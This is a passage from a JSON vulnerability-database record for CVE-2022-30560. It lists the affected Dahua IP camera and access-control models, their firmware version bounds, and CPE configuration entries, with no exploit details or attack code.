"model": "ipc-hfw2831t-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2231t-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2439m-as-led-b-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2831r-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2231s-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2831t-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2531t-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2231e-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2831r-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2231r-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2431s-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2231f-as-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2231m-as-i2-b-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2431t-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2439s-sa-led-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2531r-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "asi7223x-a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2021-09"
},
{
"model": "asi7213x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2021-09"
},
{
"model": "ipc-hfw2831t-as-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2431r-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2231t-as-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2431t-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2531r-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2531e-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2231r-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2831s-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2531t-as-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2431t-as-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2531t-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2231t-zs-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2230e-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2230s-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2431e-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2231e-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2231t-zs-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2231t-zas-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2231r-zs-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2231f-as-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2531e-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2231r-zas-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2831r-zs-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2831e-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2431r-zs-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2531r-zs-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2231t-as-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2231m-as-i2-b-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2831r-zas-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2431r-zas-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2531r-zas-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2230e-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2231s-s-s2",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2xxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "asi7xxxx",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-60683"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012804"
},
{
"db": "NVD",
"id": "CVE-2022-30560"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2230e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2230e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831r-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831r-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831r-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831r-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2831e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2831e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531r-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531r-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531r-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531r-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2531e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2531e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431r-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431r-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2431r-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2431r-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231f-as-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231f-as-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231e-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231e-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231r-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231r-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2231r-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2231r-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231m-as-i2-b-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231m-as-i2-b-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-as-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-as-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231s-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231s-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2231t-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2231t-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2230s-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2230s-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-as-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-as-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431t-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431t-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2431s-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2431s-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-as-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-as-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531t-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531t-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2531s-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2531s-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-as-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-as-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-zs-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-zs-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831t-zas-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831t-zas-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2831s-s-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2831s-s-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2439m-as-led-b-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2439m-as-led-b-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2239m-as-led-b-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2239m-as-led-b-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2439s-sa-led-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2439s-sa-led-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2239s-sa-led-s2_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2022-04",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2239s-sa-led-s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7213x-t1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-09",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7213x-t1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7223x-a-t1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-09",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7223x-a-t1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:asi7223x-a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2021-09",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:asi7223x-a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
